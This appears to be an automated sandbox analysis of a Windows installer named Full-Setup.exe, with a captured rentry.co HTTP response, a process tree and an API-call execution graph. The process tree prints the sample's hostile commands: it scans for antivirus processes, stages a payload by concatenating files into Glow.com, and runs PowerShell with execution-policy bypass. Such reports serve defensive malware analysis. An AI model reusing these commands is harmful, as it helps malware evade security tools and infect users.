                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:27 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        vary: Origin
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                        Cache-Control: Vary
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lF7ZbxlKMI9PXo%2Fka7CBdGlMNM8uqDGcsstJnE5Y4z1nuPkw1gVI9BRuxn11nwhXQ0C9bq8NoNzTwO3Xbjs7BocxSmAAiTCcjXsdtLkPkXndF1D5OiDB50svHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b92a099e4213-EWR
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1799137&cwnd=229&unsent_bytes=0&cid=7bfba3defb2c3fad&ts=578&x=0"
                                                                                                                                                                        2024-12-21 12:02:27 UTC434INData Raw: 31 36 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65
                                                                                                                                                                        Data Ascii: 161b<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
                                                                                                                                                                        2024-12-21 12:02:27 UTC1369INData Raw: 74 3d 22 73 75 6d 6d 61 72 79 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e
                                                                                                                                                                        Data Ascii: t="summary" /><meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta n
                                                                                                                                                                        2024-12-21 12:02:27 UTC1369INData Raw: 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68
                                                                                                                                                                        Data Ascii: localStorage.getItem("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.h
                                                                                                                                                                        2024-12-21 12:02:27 UTC1369INData Raw: 20 6d 61 79 20 61 6c 73 6f 20 75 73 65 20 74 68 69 73 20 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20
                                                                                                                                                                        Data Ascii: may also use this access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us
                                                                                                                                                                        2024-12-21 12:02:27 UTC1126INData Raw: 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28
                                                                                                                                                                        Data Ascii: code.min.js"></script><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(
                                                                                                                                                                        2024-12-21 12:02:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:07:01:17
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Full-Setup.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'286'284 bytes
                                                                                                                                                                        MD5 hash:8F260F06588B4B171CAA42F66929D9A6
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:07:01:18
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:07:01:18
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:07:01:19
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:07:01:19
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0xe0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c md 600044
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /V "Mary" Exploring
                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:Glow.com k
                                                                                                                                                                        Imagebase:0x380000
                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:07:01:20
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                        Imagebase:0xa30000
                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:07:02:26
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"
                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:07:02:26
                                                                                                                                                                        Start date:21/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:17.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                          Total number of Limit Nodes:26
                                                                                                                                                                          execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 